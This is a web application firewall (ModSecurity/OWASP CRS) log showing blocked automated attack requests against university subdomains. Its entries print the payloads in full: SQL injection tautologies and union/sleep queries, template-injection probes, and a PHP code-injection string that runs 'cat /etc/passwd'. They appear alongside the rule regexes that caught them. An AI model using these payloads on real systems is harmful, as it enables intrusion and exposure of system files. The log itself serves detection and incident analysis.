[Tue Aug 29 11:32:05.414712 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10xcCo-f0AAAQ7NF8AAAAH"]
[Tue Aug 29 11:32:05.432789 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQR4@4AAAAz"]
[Tue Aug 29 11:32:05.435168 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQ7NGAAAAAH"]
[Tue Aug 29 11:32:05.454258 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQ7NGEAAAAH"]
[Tue Aug 29 11:32:06.319540 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQMrzcAAAAu"]
[Tue Aug 29 11:32:06.334817 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQR4-IAAAAz"]
[Tue Aug 29 11:32:06.354336 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQR4-MAAAAz"]
[Tue Aug 29 11:32:06.374456 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAPiBpcAAAAB"]
[Tue Aug 29 11:32:06.377238 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQ7NGQAAAAH"]
[Tue Aug 29 11:32:06.380819 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAP5mOEAAAAM"]
[Tue Aug 29 11:32:06.423725 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAQV4S4AAAA3"]
[Tue Aug 29 11:32:06.439326 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10xsCo-f0AAAPiBpoAAAAB"]
[Tue Aug 29 11:32:06.443388 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAQ7NGcAAAAH"]
[Tue Aug 29 11:32:06.456225 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAQR4-gAAAAz"]
[Tue Aug 29 11:32:06.457312 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAP5mOQAAAAM"]
[Tue Aug 29 11:32:06.459947 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAPiBpsAAAAB"]
[Tue Aug 29 11:32:06.483682 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQV4TEAAAA3"]
[Tue Aug 29 11:32:07.307416 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAP5mOYAAAAM"]
[Tue Aug 29 11:32:07.319571 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10x8Co-f0AAAP8G3wAAAAV"]
[Tue Aug 29 11:32:07.336403 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10x8Co-f0AAAQ7NGsAAAAH"]
[Tue Aug 29 11:32:07.369629 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAQR4-wAAAAz"]
[Tue Aug 29 11:32:07.377522 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10x8Co-f0AAAQ83P8AAAAI"]
[Tue Aug 29 11:32:07.435950 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10x8Co-f0AAAP5mOgAAAAM"]
[Tue Aug 29 11:32:07.737563 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAQ7NG0AAAAH"]
[Tue Aug 29 11:32:07.740420 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAQV4TQAAAA3"]
[Tue Aug 29 11:32:07.797372 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAP5mOkAAAAM"]
